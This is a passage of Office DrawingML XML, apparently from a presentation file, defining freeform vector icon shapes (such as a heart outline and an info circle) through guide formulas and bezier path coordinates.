                  <a:gd name="T29" fmla="*/ 102 h 116"/>
                  <a:gd name="T30" fmla="*/ 30 w 119"/>
                  <a:gd name="T31" fmla="*/ 100 h 116"/>
                  <a:gd name="T32" fmla="*/ 28 w 119"/>
                  <a:gd name="T33" fmla="*/ 99 h 116"/>
                  <a:gd name="T34" fmla="*/ 21 w 119"/>
                  <a:gd name="T35" fmla="*/ 83 h 116"/>
                  <a:gd name="T36" fmla="*/ 22 w 119"/>
                  <a:gd name="T37" fmla="*/ 80 h 116"/>
                  <a:gd name="T38" fmla="*/ 22 w 119"/>
                  <a:gd name="T39" fmla="*/ 70 h 116"/>
                  <a:gd name="T40" fmla="*/ 24 w 119"/>
                  <a:gd name="T41" fmla="*/ 67 h 116"/>
                  <a:gd name="T42" fmla="*/ 24 w 119"/>
                  <a:gd name="T43" fmla="*/ 57 h 116"/>
                  <a:gd name="T44" fmla="*/ 27 w 119"/>
                  <a:gd name="T45" fmla="*/ 52 h 116"/>
                  <a:gd name="T46" fmla="*/ 11 w 119"/>
                  <a:gd name="T47" fmla="*/ 46 h 116"/>
                  <a:gd name="T48" fmla="*/ 3 w 119"/>
                  <a:gd name="T49" fmla="*/ 28 h 116"/>
                  <a:gd name="T50" fmla="*/ 22 w 119"/>
                  <a:gd name="T51" fmla="*/ 19 h 116"/>
                  <a:gd name="T52" fmla="*/ 86 w 119"/>
                  <a:gd name="T53" fmla="*/ 106 h 116"/>
                  <a:gd name="T54" fmla="*/ 90 w 119"/>
                  <a:gd name="T55" fmla="*/ 104 h 116"/>
                  <a:gd name="T56" fmla="*/ 88 w 119"/>
                  <a:gd name="T57" fmla="*/ 99 h 116"/>
                  <a:gd name="T58" fmla="*/ 84 w 119"/>
                  <a:gd name="T59" fmla="*/ 101 h 116"/>
                  <a:gd name="T60" fmla="*/ 86 w 119"/>
                  <a:gd name="T61" fmla="*/ 106 h 116"/>
                  <a:gd name="T62" fmla="*/ 15 w 119"/>
                  <a:gd name="T63" fmla="*/ 40 h 116"/>
                  <a:gd name="T64" fmla="*/ 41 w 119"/>
                  <a:gd name="T65" fmla="*/ 50 h 116"/>
                  <a:gd name="T66" fmla="*/ 42 w 119"/>
                  <a:gd name="T67" fmla="*/ 50 h 116"/>
                  <a:gd name="T68" fmla="*/ 39 w 119"/>
                  <a:gd name="T69" fmla="*/ 57 h 116"/>
                  <a:gd name="T70" fmla="*/ 38 w 119"/>
                  <a:gd name="T71" fmla="*/ 57 h 116"/>
                  <a:gd name="T72" fmla="*/ 31 w 119"/>
                  <a:gd name="T73" fmla="*/ 60 h 116"/>
                  <a:gd name="T74" fmla="*/ 32 w 119"/>
                  <a:gd name="T75" fmla="*/ 66 h 116"/>
                  <a:gd name="T76" fmla="*/ 34 w 119"/>
                  <a:gd name="T77" fmla="*/ 68 h 116"/>
                  <a:gd name="T78" fmla="*/ 31 w 119"/>
                  <a:gd name="T79" fmla="*/ 70 h 116"/>
                  <a:gd name="T80" fmla="*/ 30 w 119"/>
                  <a:gd name="T81" fmla="*/ 73 h 116"/>
                  <a:gd name="T82" fmla="*/ 30 w 119"/>
                  <a:gd name="T83" fmla="*/ 78 h 116"/>
                  <a:gd name="T84" fmla="*/ 32 w 119"/>
                  <a:gd name="T85" fmla="*/ 81 h 116"/>
                  <a:gd name="T86" fmla="*/ 30 w 119"/>
                  <a:gd name="T87" fmla="*/ 83 h 116"/>
                  <a:gd name="T88" fmla="*/ 28 w 119"/>
                  <a:gd name="T89" fmla="*/ 85 h 116"/>
                  <a:gd name="T90" fmla="*/ 31 w 119"/>
                  <a:gd name="T91" fmla="*/ 93 h 116"/>
                  <a:gd name="T92" fmla="*/ 33 w 119"/>
                  <a:gd name="T93" fmla="*/ 93 h 116"/>
                  <a:gd name="T94" fmla="*/ 38 w 119"/>
                  <a:gd name="T95" fmla="*/ 95 h 116"/>
                  <a:gd name="T96" fmla="*/ 60 w 119"/>
                  <a:gd name="T97" fmla="*/ 96 h 116"/>
                  <a:gd name="T98" fmla="*/ 78 w 119"/>
                  <a:gd name="T99" fmla="*/ 95 h 116"/>
                  <a:gd name="T100" fmla="*/ 92 w 119"/>
                  <a:gd name="T101" fmla="*/ 59 h 116"/>
                  <a:gd name="T102" fmla="*/ 88 w 119"/>
                  <a:gd name="T103" fmla="*/ 55 h 116"/>
                  <a:gd name="T104" fmla="*/ 83 w 119"/>
                  <a:gd name="T105" fmla="*/ 20 h 116"/>
                  <a:gd name="T106" fmla="*/ 79 w 119"/>
                  <a:gd name="T107" fmla="*/ 12 h 116"/>
                  <a:gd name="T108" fmla="*/ 70 w 119"/>
                  <a:gd name="T109" fmla="*/ 15 h 116"/>
                  <a:gd name="T110" fmla="*/ 67 w 119"/>
                  <a:gd name="T111" fmla="*/ 37 h 116"/>
                  <a:gd name="T112" fmla="*/ 66 w 119"/>
                  <a:gd name="T113" fmla="*/ 44 h 116"/>
                  <a:gd name="T114" fmla="*/ 20 w 119"/>
                  <a:gd name="T115" fmla="*/ 26 h 116"/>
                  <a:gd name="T116" fmla="*/ 10 w 119"/>
                  <a:gd name="T117" fmla="*/ 31 h 116"/>
                  <a:gd name="T118" fmla="*/ 15 w 119"/>
                  <a:gd name="T119" fmla="*/ 4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9" h="116">
                    <a:moveTo>
                      <a:pt x="22" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="24"/>
                      <a:pt x="59" y="21"/>
                      <a:pt x="62" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="4"/>
                      <a:pt x="74" y="0"/>
                      <a:pt x="82" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="6"/>
                      <a:pt x="94" y="15"/>
                      <a:pt x="91" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="34"/>
                      <a:pt x="89" y="41"/>
                      <a:pt x="95" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="50"/>
                      <a:pt x="95" y="50"/>
                      <a:pt x="95" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="41"/>
                      <a:pt x="99" y="41"/>
                      <a:pt x="99" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="49"/>
                      <a:pt x="119" y="49"/>
                      <a:pt x="119" y="49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73" y="109"/>
                      <a:pt x="73" y="109"/>
                      <a:pt x="73" y="109"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="103"/>
                      <a:pt x="75" y="103"/>
                      <a:pt x="75" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="101"/>
                      <a:pt x="66" y="102"/>
                      <a:pt x="63" y="103"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="104"/>
                      <a:pt x="57" y="106"/>
                      <a:pt x="53" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="106"/>
                      <a:pt x="42" y="105"/>
                      <a:pt x="35" y="102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1" y="97"/>
                      <a:pt x="18" y="89"/>
                      <a:pt x="21" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="82"/>
                      <a:pt x="22" y="81"/>
                      <a:pt x="22" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="77"/>
                      <a:pt x="21" y="73"/>
                      <a:pt x="22" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="69"/>
                      <a:pt x="23" y="68"/>
                      <a:pt x="24" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="64"/>
                      <a:pt x="23" y="60"/>
                      <a:pt x="24" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="55"/>
                      <a:pt x="26" y="54"/>
                      <a:pt x="27" y="5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4" y="44"/>
                      <a:pt x="0" y="35"/>
                      <a:pt x="3" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="20"/>
                      <a:pt x="14" y="16"/>
                      <a:pt x="22" y="19"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="86" y="106"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="106"/>
                      <a:pt x="90" y="106"/>
                      <a:pt x="90" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="102"/>
                      <a:pt x="90" y="100"/>
                      <a:pt x="88" y="99"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="98"/>
                      <a:pt x="84" y="99"/>
                      <a:pt x="84" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="103"/>
                      <a:pt x="84" y="105"/>
                      <a:pt x="86" y="106"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="15" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="50"/>
                      <a:pt x="41" y="50"/>
                      <a:pt x="41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8" y="57"/>
                      <a:pt x="38" y="57"/>
                      <a:pt x="38" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="56"/>
                      <a:pt x="32" y="57"/>
                      <a:pt x="31" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="62"/>
                      <a:pt x="31" y="64"/>
                      <a:pt x="32" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="68"/>
                      <a:pt x="34" y="68"/>
                      <a:pt x="34" y="68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1" y="71"/>
                      <a:pt x="30" y="72"/>
                      <a:pt x="30" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="75"/>
                      <a:pt x="29" y="77"/>
                      <a:pt x="30" y="78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9" y="84"/>
                      <a:pt x="28" y="85"/>
                      <a:pt x="28" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="88"/>
                      <a:pt x="28" y="92"/>
                      <a:pt x="31" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="93"/>
                      <a:pt x="33" y="93"/>
                      <a:pt x="33" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="95"/>
                      <a:pt x="38" y="95"/>
                      <a:pt x="38" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="100"/>
                      <a:pt x="56" y="97"/>
                      <a:pt x="60" y="96"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="94"/>
                      <a:pt x="68" y="92"/>
                      <a:pt x="78" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="59"/>
                      <a:pt x="92" y="59"/>
                      <a:pt x="92" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="58"/>
                      <a:pt x="89" y="56"/>
                      <a:pt x="88" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="43"/>
                      <a:pt x="78" y="34"/>
                      <a:pt x="83" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="17"/>
                      <a:pt x="83" y="13"/>
                      <a:pt x="79" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="10"/>
                      <a:pt x="72" y="12"/>
                      <a:pt x="70" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="24"/>
                      <a:pt x="67" y="27"/>
                      <a:pt x="67" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="39"/>
                      <a:pt x="66" y="42"/>
                      <a:pt x="66" y="44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16" y="25"/>
                      <a:pt x="12" y="27"/>
                      <a:pt x="10" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="34"/>
                      <a:pt x="11" y="38"/>
                      <a:pt x="15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0" name="Freeform 96">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E14CD134-8836-4035-9536-787B086FBC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95545" y="4229413"/>
                <a:ext cx="459973" cy="403210"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 144 w 144"/>
                  <a:gd name="T1" fmla="*/ 41 h 126"/>
                  <a:gd name="T2" fmla="*/ 102 w 144"/>
                  <a:gd name="T3" fmla="*/ 0 h 126"/>
                  <a:gd name="T4" fmla="*/ 72 w 144"/>
                  <a:gd name="T5" fmla="*/ 14 h 126"/>
                  <a:gd name="T6" fmla="*/ 41 w 144"/>
                  <a:gd name="T7" fmla="*/ 0 h 126"/>
                  <a:gd name="T8" fmla="*/ 0 w 144"/>
                  <a:gd name="T9" fmla="*/ 41 h 126"/>
                  <a:gd name="T10" fmla="*/ 13 w 144"/>
                  <a:gd name="T11" fmla="*/ 72 h 126"/>
                  <a:gd name="T12" fmla="*/ 13 w 144"/>
                  <a:gd name="T13" fmla="*/ 72 h 126"/>
                  <a:gd name="T14" fmla="*/ 58 w 144"/>
                  <a:gd name="T15" fmla="*/ 117 h 126"/>
                  <a:gd name="T16" fmla="*/ 72 w 144"/>
                  <a:gd name="T17" fmla="*/ 126 h 126"/>
                  <a:gd name="T18" fmla="*/ 85 w 144"/>
                  <a:gd name="T19" fmla="*/ 117 h 126"/>
                  <a:gd name="T20" fmla="*/ 130 w 144"/>
                  <a:gd name="T21" fmla="*/ 72 h 126"/>
                  <a:gd name="T22" fmla="*/ 130 w 144"/>
                  <a:gd name="T23" fmla="*/ 72 h 126"/>
                  <a:gd name="T24" fmla="*/ 144 w 144"/>
                  <a:gd name="T25" fmla="*/ 41 h 126"/>
                  <a:gd name="T26" fmla="*/ 118 w 144"/>
                  <a:gd name="T27" fmla="*/ 59 h 126"/>
                  <a:gd name="T28" fmla="*/ 73 w 144"/>
                  <a:gd name="T29" fmla="*/ 104 h 126"/>
                  <a:gd name="T30" fmla="*/ 72 w 144"/>
                  <a:gd name="T31" fmla="*/ 105 h 126"/>
                  <a:gd name="T32" fmla="*/ 71 w 144"/>
                  <a:gd name="T33" fmla="*/ 104 h 126"/>
                  <a:gd name="T34" fmla="*/ 25 w 144"/>
                  <a:gd name="T35" fmla="*/ 59 h 126"/>
                  <a:gd name="T36" fmla="*/ 18 w 144"/>
                  <a:gd name="T37" fmla="*/ 41 h 126"/>
                  <a:gd name="T38" fmla="*/ 41 w 144"/>
                  <a:gd name="T39" fmla="*/ 18 h 126"/>
                  <a:gd name="T40" fmla="*/ 58 w 144"/>
                  <a:gd name="T41" fmla="*/ 26 h 126"/>
                  <a:gd name="T42" fmla="*/ 72 w 144"/>
                  <a:gd name="T43" fmla="*/ 40 h 126"/>
                  <a:gd name="T44" fmla="*/ 85 w 144"/>
                  <a:gd name="T45" fmla="*/ 26 h 126"/>
                  <a:gd name="T46" fmla="*/ 102 w 144"/>
                  <a:gd name="T47" fmla="*/ 18 h 126"/>
                  <a:gd name="T48" fmla="*/ 126 w 144"/>
                  <a:gd name="T49" fmla="*/ 41 h 126"/>
                  <a:gd name="T50" fmla="*/ 118 w 144"/>
                  <a:gd name="T51" fmla="*/ 59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6">
                    <a:moveTo>
                      <a:pt x="144" y="41"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="19"/>
                      <a:pt x="125" y="0"/>
                      <a:pt x="102" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="0"/>
                      <a:pt x="79" y="5"/>
                      <a:pt x="72" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="5"/>
                      <a:pt x="53" y="0"/>
                      <a:pt x="41" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="0"/>
                      <a:pt x="0" y="19"/>
                      <a:pt x="0" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="54"/>
                      <a:pt x="5" y="65"/>
                      <a:pt x="13" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="72"/>
                      <a:pt x="13" y="72"/>
                      <a:pt x="13" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="117"/>
                      <a:pt x="58" y="117"/>
                      <a:pt x="58" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="122"/>
                      <a:pt x="67" y="126"/>
                      <a:pt x="72" y="126"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="126"/>
                      <a:pt x="81" y="122"/>
                      <a:pt x="85" y="117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0" y="72"/>
                      <a:pt x="130" y="72"/>
                      <a:pt x="130" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="65"/>
                      <a:pt x="144" y="54"/>
                      <a:pt x="144" y="41"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="118" y="59"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="104"/>
                      <a:pt x="73" y="104"/>
                      <a:pt x="73" y="104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105"/>
                      <a:pt x="71" y="105"/>
                      <a:pt x="71" y="104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0" y="54"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="18" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="29"/>
                      <a:pt x="28" y="18"/>
                      <a:pt x="41" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="18"/>
                      <a:pt x="54" y="21"/>
                      <a:pt x="58" y="26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90" y="21"/>
                      <a:pt x="96" y="18"/>
                      <a:pt x="102" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="18"/>
                      <a:pt x="126" y="29"/>
                      <a:pt x="126" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="48"/>
                      <a:pt x="123" y="54"/>
                      <a:pt x="11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1" name="Freeform 97">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F4FB0AF-CC5E-4718-8159-4C502C828A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58179" y="4663940"/>
                <a:ext cx="195733" cy="195733"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 31 w 61"/>
                  <a:gd name="T1" fmla="*/ 0 h 61"/>
                  <a:gd name="T2" fmla="*/ 0 w 61"/>
                  <a:gd name="T3" fmla="*/ 30 h 61"/>
                  <a:gd name="T4" fmla="*/ 31 w 61"/>
                  <a:gd name="T5" fmla="*/ 61 h 61"/>
                  <a:gd name="T6" fmla="*/ 61 w 61"/>
                  <a:gd name="T7" fmla="*/ 30 h 61"/>
                  <a:gd name="T8" fmla="*/ 31 w 61"/>
                  <a:gd name="T9" fmla="*/ 0 h 61"/>
                  <a:gd name="T10" fmla="*/ 31 w 61"/>
                  <a:gd name="T11" fmla="*/ 55 h 61"/>
                  <a:gd name="T12" fmla="*/ 6 w 61"/>
                  <a:gd name="T13" fmla="*/ 30 h 61"/>
                  <a:gd name="T14" fmla="*/ 31 w 61"/>
                  <a:gd name="T15" fmla="*/ 6 h 61"/>
                  <a:gd name="T16" fmla="*/ 55 w 61"/>
                  <a:gd name="T17" fmla="*/ 30 h 61"/>
                  <a:gd name="T18" fmla="*/ 31 w 61"/>
                  <a:gd name="T19" fmla="*/ 55 h 61"/>
                  <a:gd name="T20" fmla="*/ 27 w 61"/>
                  <a:gd name="T21" fmla="*/ 15 h 61"/>
                  <a:gd name="T22" fmla="*/ 34 w 61"/>
                  <a:gd name="T23" fmla="*/ 15 h 61"/>
                  <a:gd name="T24" fmla="*/ 34 w 61"/>
                  <a:gd name="T25" fmla="*/ 23 h 61"/>
                  <a:gd name="T26" fmla="*/ 27 w 61"/>
                  <a:gd name="T27" fmla="*/ 23 h 61"/>
                  <a:gd name="T28" fmla="*/ 27 w 61"/>
                  <a:gd name="T29" fmla="*/ 15 h 61"/>
                  <a:gd name="T30" fmla="*/ 38 w 61"/>
                  <a:gd name="T31" fmla="*/ 46 h 61"/>
                  <a:gd name="T32" fmla="*/ 23 w 61"/>
                  <a:gd name="T33" fmla="*/ 46 h 61"/>
                  <a:gd name="T34" fmla="*/ 23 w 61"/>
                  <a:gd name="T35" fmla="*/ 42 h 61"/>
                  <a:gd name="T36" fmla="*/ 27 w 61"/>
                  <a:gd name="T37" fmla="*/ 42 h 61"/>
                  <a:gd name="T38" fmla="*/ 27 w 61"/>
                  <a:gd name="T39" fmla="*/ 30 h 61"/>
                  <a:gd name="T40" fmla="*/ 23 w 61"/>
                  <a:gd name="T41" fmla="*/ 30 h 61"/>
                  <a:gd name="T42" fmla="*/ 23 w 61"/>
                  <a:gd name="T43" fmla="*/ 27 h 61"/>
                  <a:gd name="T44" fmla="*/ 34 w 61"/>
                  <a:gd name="T45" fmla="*/ 27 h 61"/>
                  <a:gd name="T46" fmla="*/ 34 w 61"/>
                  <a:gd name="T47" fmla="*/ 42 h 61"/>
                  <a:gd name="T48" fmla="*/ 38 w 61"/>
                  <a:gd name="T49" fmla="*/ 42 h 61"/>
                  <a:gd name="T50" fmla="*/ 38 w 61"/>
                  <a:gd name="T51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1" h="61">
                    <a:moveTo>
                      <a:pt x="31" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="0"/>
                      <a:pt x="0" y="14"/>
                      <a:pt x="0" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="47"/>
                      <a:pt x="14" y="61"/>
                      <a:pt x="31" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="61"/>
                      <a:pt x="61" y="47"/>
                      <a:pt x="61" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="14"/>
                      <a:pt x="47" y="0"/>
                      <a:pt x="31" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="31" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="55"/>
                      <a:pt x="6" y="44"/>
                      <a:pt x="6" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="17"/>
                      <a:pt x="17" y="6"/>
                      <a:pt x="31" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="6"/>
                      <a:pt x="55" y="17"/>
                      <a:pt x="55" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="44"/>
                      <a:pt x="44" y="55"/>
                      <a:pt x="31" y="55"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="27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7" y="23"/>
                      <a:pt x="27" y="23"/>
                      <a:pt x="27" y="23"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="27" y="15"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="38" y="46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8" y="42"/>
                      <a:pt x="38" y="42"/>
                      <a:pt x="38" y="42"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3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2" name="Freeform 98">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{133667EB-85CD-4C9B-B05D-532CAFB7D2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07112" y="4990815"/>
                <a:ext cx="299472" cy="301429"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 85 w 94"/>
                  <a:gd name="T1" fmla="*/ 20 h 94"/>
                  <a:gd name="T2" fmla="*/ 37 w 94"/>
                  <a:gd name="T3" fmla="*/ 2 h 94"/>
                  <a:gd name="T4" fmla="*/ 20 w 94"/>
                  <a:gd name="T5" fmla="*/ 10 h 94"/>
                  <a:gd name="T6" fmla="*/ 2 w 94"/>
                  <a:gd name="T7" fmla="*/ 57 h 94"/>
                  <a:gd name="T8" fmla="*/ 10 w 94"/>
                  <a:gd name="T9" fmla="*/ 74 h 94"/>
                  <a:gd name="T10" fmla="*/ 57 w 94"/>
                  <a:gd name="T11" fmla="*/ 92 h 94"/>
                  <a:gd name="T12" fmla="*/ 74 w 94"/>
                  <a:gd name="T13" fmla="*/ 84 h 94"/>
                  <a:gd name="T14" fmla="*/ 92 w 94"/>
                  <a:gd name="T15" fmla="*/ 37 h 94"/>
                  <a:gd name="T16" fmla="*/ 85 w 94"/>
                  <a:gd name="T17" fmla="*/ 20 h 94"/>
                  <a:gd name="T18" fmla="*/ 36 w 94"/>
                  <a:gd name="T19" fmla="*/ 38 h 94"/>
                  <a:gd name="T20" fmla="*/ 62 w 94"/>
                  <a:gd name="T21" fmla="*/ 47 h 94"/>
                  <a:gd name="T22" fmla="*/ 61 w 94"/>
                  <a:gd name="T23" fmla="*/ 52 h 94"/>
                  <a:gd name="T24" fmla="*/ 42 w 94"/>
                  <a:gd name="T25" fmla="*/ 61 h 94"/>
                  <a:gd name="T26" fmla="*/ 33 w 94"/>
                  <a:gd name="T27" fmla="*/ 42 h 94"/>
                  <a:gd name="T28" fmla="*/ 36 w 94"/>
                  <a:gd name="T29" fmla="*/ 38 h 94"/>
                  <a:gd name="T30" fmla="*/ 76 w 94"/>
                  <a:gd name="T31" fmla="*/ 53 h 94"/>
                  <a:gd name="T32" fmla="*/ 69 w 94"/>
                  <a:gd name="T33" fmla="*/ 71 h 94"/>
                  <a:gd name="T34" fmla="*/ 66 w 94"/>
                  <a:gd name="T35" fmla="*/ 80 h 94"/>
                  <a:gd name="T36" fmla="*/ 59 w 94"/>
                  <a:gd name="T37" fmla="*/ 82 h 94"/>
                  <a:gd name="T38" fmla="*/ 15 w 94"/>
                  <a:gd name="T39" fmla="*/ 65 h 94"/>
                  <a:gd name="T40" fmla="*/ 12 w 94"/>
                  <a:gd name="T41" fmla="*/ 59 h 94"/>
                  <a:gd name="T42" fmla="*/ 15 w 94"/>
                  <a:gd name="T43" fmla="*/ 50 h 94"/>
                  <a:gd name="T44" fmla="*/ 22 w 94"/>
                  <a:gd name="T45" fmla="*/ 32 h 94"/>
                  <a:gd name="T46" fmla="*/ 22 w 94"/>
                  <a:gd name="T47" fmla="*/ 32 h 94"/>
                  <a:gd name="T48" fmla="*/ 29 w 94"/>
                  <a:gd name="T49" fmla="*/ 35 h 94"/>
                  <a:gd name="T50" fmla="*/ 27 w 94"/>
                  <a:gd name="T51" fmla="*/ 39 h 94"/>
                  <a:gd name="T52" fmla="*/ 39 w 94"/>
                  <a:gd name="T53" fmla="*/ 67 h 94"/>
                  <a:gd name="T54" fmla="*/ 67 w 94"/>
                  <a:gd name="T55" fmla="*/ 55 h 94"/>
                  <a:gd name="T56" fmla="*/ 69 w 94"/>
                  <a:gd name="T57" fmla="*/ 50 h 94"/>
                  <a:gd name="T58" fmla="*/ 76 w 94"/>
                  <a:gd name="T59" fmla="*/ 53 h 94"/>
                  <a:gd name="T60" fmla="*/ 82 w 94"/>
                  <a:gd name="T61" fmla="*/ 37 h 94"/>
                  <a:gd name="T62" fmla="*/ 79 w 94"/>
                  <a:gd name="T63" fmla="*/ 38 h 94"/>
                  <a:gd name="T64" fmla="*/ 74 w 94"/>
                  <a:gd name="T65" fmla="*/ 37 h 94"/>
                  <a:gd name="T66" fmla="*/ 73 w 94"/>
                  <a:gd name="T67" fmla="*/ 34 h 94"/>
                  <a:gd name="T68" fmla="*/ 74 w 94"/>
                  <a:gd name="T69" fmla="*/ 29 h 94"/>
                  <a:gd name="T70" fmla="*/ 77 w 94"/>
                  <a:gd name="T71" fmla="*/ 28 h 94"/>
                  <a:gd name="T72" fmla="*/ 82 w 94"/>
                  <a:gd name="T73" fmla="*/ 29 h 94"/>
                  <a:gd name="T74" fmla="*/ 83 w 94"/>
                  <a:gd name="T75" fmla="*/ 33 h 94"/>
                  <a:gd name="T76" fmla="*/ 82 w 94"/>
                  <a:gd name="T77" fmla="*/ 37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4" h="94">
                    <a:moveTo>
                      <a:pt x="85" y="20"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="2"/>
                      <a:pt x="37" y="2"/>
                      <a:pt x="37" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="0"/>
                      <a:pt x="23" y="3"/>
                      <a:pt x="20" y="10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0" y="64"/>
                      <a:pt x="3" y="71"/>
                      <a:pt x="10" y="74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64" y="94"/>
                      <a:pt x="71" y="91"/>
                      <a:pt x="74" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="37"/>
                      <a:pt x="92" y="37"/>
